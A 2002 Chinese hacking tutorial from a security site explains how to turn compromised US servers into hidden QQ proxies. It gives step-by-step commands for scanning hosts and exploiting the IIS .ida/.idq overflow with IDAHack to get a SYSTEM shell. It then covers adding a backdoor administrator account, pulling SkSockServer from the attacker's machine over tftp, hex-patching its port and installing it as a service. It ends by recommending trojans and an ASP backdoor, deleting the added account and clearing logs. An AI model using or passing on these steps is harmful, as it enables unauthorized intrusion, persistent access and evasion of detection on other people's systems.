首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>本站原创>入侵经验>文章内容
我是如何实现qq用代理而显示的端口是4000不被人发现是用了代理的
来源:vittersafe.tk 作者:vitter 发布时间:2002-11-08  

by:vitterhttp://www.safechina.nethttp://vitter.net.tf

闲来无事,找了几台美国老的机器做qq的代理,实现QQ隐藏ip,什么日本,韩国,台湾的都可以,哈哈~~不过发现自己的QQ显示端口都是1040,1041之类,当和一些大虾聊天的时候他们也知道我用跳板上QQ ,因为他们的也是1040之类的,那如何实现让别人不知道你用的是代理呢?可以让代理的udp端口用4000来代理,这样别人就不会知道了:P 废话就不多说了,下面干活:

先祭出我们敬爱的榕G的流光4.7,对准美国的ip开始扫描,(呵呵~~对于初学者,流光可是个好东东哦)砌杯茶,运气好的话我们可以得到好多有漏洞的主机,那我们就以简单的.ida.idq漏洞为例: 用sunx的IDAHack.exe溢出工具试试系统装没装PACK,或PACK1 PACK2 结果装了PACK2,我们就这样:

G:\tool>IDAHack xxx.xxx.xxx.xxx 80 6 999index server 2 overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, :p

connecting...sending...checking...Now you can telnet to 999 portgood luck :)

对方溢出成功,我们得到999端口一个得到localsystem权限的shell,然后我们telnet到999端口

G:\tool>telnet xxx.xxx.xxxx.xxx 999

C:\WINNT\system32>net user vitter Aa741--- /add //添加一个vitter用户,密码写长点是害怕对方配置了密码策略,带来麻烦。C:\WINNT\system32>net localgroup administrators vitter /add //把vitter添加到administrators组中。接下来: net use i: \\xxx.xxx.xxx\C$ "Aa741---" /user:"vitter" 出有问题了:( "远程计算机不可用" TMD!! 远程主机的tcp/ip协议未绑定netbios,该死的美国老!!

然后回到ida溢出的shellC:\WINNT\system32>net start telnet,然后溢出 成功! 对方开了23 端口,再在自己的机器上建立vitter用户,密码:Aa741---,用此用户开个CMD_windows (这是干什么详见.abu.的文章"最快速登陆2000telnet") 然后 telnet xxx.xxx.xxx.xxx这样我们退出idq溢出的shell时间长了可能会引起iis死。C:\WINNT\system32>tftp -i yourADD get SkSockServer.exe //上传SkSockServer.exe(我用的是v1.09),本地机器开tftpserver,SkSockServer.exe是经过我们修改过的,为什么修改呢?那是因为SkSockServer.exe v1.09默认的UDP端口都是1025,这样代理的话,别人就会发现你用了代理了。下面介绍怎么修改SkSockServer.exe v1.09:

工具:UltraEdit-32 (这个东东知道怎么用吧!)

用UltraEdit.exe 打开SkSockServer.exe(v1.09)。。。找到00003720h: 14 66 C7 44 24 10 02 00 89 44 24 18 BE 01 04 00 ;这组数据是16进制的,最高是ffff也就是65535。。。编译生成exe的时候错了一下位。。。知道原理这样你就随便改你想要的端口了。。。v1.09默认的UDP端口都是1025,所以相应修改0104就行。改成你想要用的端口,如果你想要人家看到你的端口是8888,将0104改成B822......

然后C:\WINNT\system32>SkSockServer -Install //安装skserver

C:\WINNT\system32>SkSockServer -config Port 8888 //指定skserver端口

C:\WINNT\system32>SkSockServer -config StartType 2 //指定skserver启动类型

C:\WINNT\system32>net start skserver //启动skserver服务

呵呵~~这样代理主机已经做好,临走之前留个后门,上传一个winshell之类的或者我主页上经过我修改了的wollf(可以逃过大多数杀毒软件的查杀),还可以上传一个asp木马,我论坛有的:)然后删掉我们建立的用户,清理日志,一定要擦好pp哟,如果你想长期用它做代理的话:)

现在开开你的宝贝qq在代理输入ip端口:8888,呵呵~~上线,看看是不是用的是你指定的端口哦:)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·利用.ida漏洞、.idq漏洞入侵
·一次小区内的无线路由入侵渗透测
·内网渗透测试笔记
·一次利用show files类cgi漏洞成
·Linux下安装Metasploit破解Oracl
·一次Linux下ARP欺骗嗅探公司邮箱
  相关文章
·利用.ida漏洞、.idq漏洞入侵
·一次利用show files类cgi漏洞成
·一次Linux下ARP欺骗嗅探公司邮箱
·一次小区内的无线路由入侵渗透测
·内网渗透测试笔记
·Linux下安装Metasploit破解Oracl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved